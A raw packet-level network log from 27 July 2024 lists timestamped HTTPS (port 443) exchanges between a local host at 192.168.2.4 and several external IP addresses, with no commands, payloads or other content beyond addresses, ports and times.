Jul 27, 2024 08:54:38.334548950 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.334568977 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.334608078 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.334633112 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.334681988 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.334692955 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.334908962 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.334974051 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.334985971 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.336116076 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.336173058 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.336184025 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.337215900 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.337275028 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.337284088 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.337341070 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.337395906 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.337405920 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.339148998 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.339205980 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.339215994 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.339956045 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.340013027 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.340033054 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.343297005 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.343470097 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.343535900 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.344466925 CEST	443	50730	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:38.344547033 CEST	50730	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:38.344657898 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.344719887 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.345753908 CEST	50730	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:38.345782042 CEST	443	50730	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:38.346541882 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.346549988 CEST	443	50730	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:38.346604109 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.347140074 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.347208023 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.347217083 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.347529888 CEST	50730	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:38.347544909 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.347631931 CEST	50730	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:38.347646952 CEST	443	50730	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:38.350497961 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.350579023 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.362056017 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.362119913 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.362735987 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.362801075 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.363228083 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.363291979 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.363708019 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.363765955 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.364801884 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.364865065 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.365506887 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.365576029 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.367156982 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.367217064 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.370079994 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.370148897 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.416024923 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.416156054 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.423697948 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.423774958 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.424153090 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.424215078 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.425055981 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.425107956 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.426328897 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.426383018 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.426929951 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.426980019 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.427035093 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.427138090 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.427864075 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.427922964 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.428766966 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.428828001 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.429702997 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.429759026 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.429802895 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.429857969 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.430722952 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.430778027 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.431407928 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.431462049 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.431509018 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.431572914 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.432712078 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.432777882 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.433317900 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.433374882 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.433419943 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.433485985 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.435211897 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.435266972 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.435328007 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.435379982 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.435427904 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.435481071 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.436115026 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.436182022 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.436220884 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.436279058 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.437084913 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.437139988 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.437184095 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.437246084 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.441240072 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.450201035 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.450267076 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.451402903 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.451476097 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.451487064 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.451543093 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.451570988 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.452446938 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.452512026 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.452524900 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.452995062 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.453046083 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.453057051 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.453353882 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.455703020 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.455755949 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.456069946 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.456123114 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.470350027 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.507071018 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.507155895 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.507232904 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.507344961 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.507450104 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.507514954 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.508322954 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.508379936 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.508424997 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.508501053 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.509300947 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.509382010 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.510241985 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.510301113 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.510346889 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.510396957 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.511189938 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.511248112 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.511291981 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.511353970 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.512118101 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.512175083 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.513068914 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.513128996 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.513178110 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.513237000 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.513302088 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.514034986 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.514092922 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.514529943 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.514600039 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.514940977 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.514996052 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.515522957 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.515583992 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.515630960 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.515686989 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.516396999 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.516457081 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.516900063 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.516952038 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.518297911 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.521171093 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.521229029 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.521554947 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.521615028 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.523911953 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.523967981 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.524224043 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.524282932 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.542423010 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.542491913 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.542937040 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.543003082 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.543529987 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.543590069 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.543634892 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.543704987 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.544364929 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.544420958 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.544975996 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.545042992 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.545483112 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.545550108 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.545586109 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.545640945 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.547082901 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.569180965 CEST	443	50731	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:38.569250107 CEST	50731	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:38.571122885 CEST	50731	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:38.571129084 CEST	443	50731	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:38.571168900 CEST	50731	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:38.571171999 CEST	443	50731	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:38.571321964 CEST	50731	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:38.571325064 CEST	443	50731	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:38.571441889 CEST	443	50731	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:38.575350046 CEST	50731	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:38.575365067 CEST	443	50731	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:38.596589088 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.596685886 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.596915960 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.596995115 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.597115993 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.597177029 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.597918034 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.597978115 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.598028898 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.598086119 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.598587036 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.598648071 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.598691940 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.598748922 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.599442005 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.599502087 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.600284100 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.600351095 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.600364923 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.600475073 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.600522041 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.729928970 CEST	443	50730	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:38.730132103 CEST	443	50730	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:38.730454922 CEST	50730	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:38.765127897 CEST	50730	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:38.765187025 CEST	443	50730	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:38.945354939 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:39.439160109 CEST	443	50731	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:39.439347982 CEST	443	50731	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:39.439402103 CEST	50731	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:39.465840101 CEST	50731	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:39.465850115 CEST	443	50731	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:39.465878963 CEST	50731	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:39.465883017 CEST	443	50731	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:39.468352079 CEST	50732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:39.468432903 CEST	443	50732	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:39.468544006 CEST	50732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:39.468811035 CEST	50732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:39.468846083 CEST	443	50732	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:39.572416067 CEST	50733	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:39.572525024 CEST	443	50733	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:39.572691917 CEST	50733	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:39.572973967 CEST	50733	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:39.573000908 CEST	443	50733	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:39.949480057 CEST	443	50732	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:39.949656010 CEST	50732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:39.950737000 CEST	50732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:39.950764894 CEST	443	50732	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:39.951329947 CEST	443	50732	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:39.952404976 CEST	50732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:39.953187943 CEST	50732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:39.953234911 CEST	443	50732	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:39.953355074 CEST	50732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:39.953404903 CEST	443	50732	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:39.953552961 CEST	50732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:39.953603029 CEST	443	50732	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:39.953774929 CEST	50732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:39.953840017 CEST	443	50732	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:39.954032898 CEST	50732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:39.954092979 CEST	443	50732	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:39.954371929 CEST	50732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:39.954425097 CEST	443	50732	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:39.954457045 CEST	50732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:39.954485893 CEST	443	50732	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:39.954591036 CEST	50732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:39.954644918 CEST	443	50732	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:39.954684019 CEST	50732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:39.954787016 CEST	50732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:39.954843998 CEST	50732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:39.963946104 CEST	443	50732	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:39.964152098 CEST	50732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:39.964211941 CEST	443	50732	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:39.964238882 CEST	50732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:39.964277029 CEST	443	50732	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:39.964346886 CEST	50732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:39.969461918 CEST	443	50732	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:40.192632914 CEST	443	50733	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:40.192708015 CEST	50733	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:40.206007004 CEST	50733	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:40.206067085 CEST	443	50733	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:40.206111908 CEST	50733	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:40.206127882 CEST	443	50733	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:40.206847906 CEST	443	50733	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:40.207005978 CEST	50733	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:40.248539925 CEST	443	50733	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:40.438601971 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:41.420690060 CEST	443	50732	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:41.420897007 CEST	443	50732	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:41.421087027 CEST	50732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:41.423201084 CEST	50732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:41.423238039 CEST	443	50732	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:41.445924997 CEST	50734	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:41.445969105 CEST	443	50734	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:41.446054935 CEST	50734	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:41.446314096 CEST	50734	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:41.446332932 CEST	443	50734	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:41.528793097 CEST	50734	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:41.573919058 CEST	443	50733	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:41.574014902 CEST	443	50733	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:41.574090958 CEST	50733	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:41.585895061 CEST	50733	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:41.585942030 CEST	443	50733	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:41.586055994 CEST	50733	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:41.586074114 CEST	443	50733	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:41.697364092 CEST	50735	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:41.697446108 CEST	443	50735	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:41.697520018 CEST	50735	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:41.697899103 CEST	50735	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:41.697921991 CEST	443	50735	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:42.364614010 CEST	443	50735	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:42.364698887 CEST	50735	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:42.367299080 CEST	50735	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:42.367307901 CEST	443	50735	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:42.367388964 CEST	50735	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:42.367393017 CEST	443	50735	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:42.367446899 CEST	50735	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:42.367449999 CEST	443	50735	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:42.367651939 CEST	443	50735	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:42.367808104 CEST	50735	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:42.367820978 CEST	443	50735	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:42.384139061 CEST	50736	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:42.384167910 CEST	443	50736	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:42.384251118 CEST	50736	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:42.385605097 CEST	50736	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:42.385617018 CEST	443	50736	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:42.886786938 CEST	443	50736	172.67.213.85	192.168.2.4
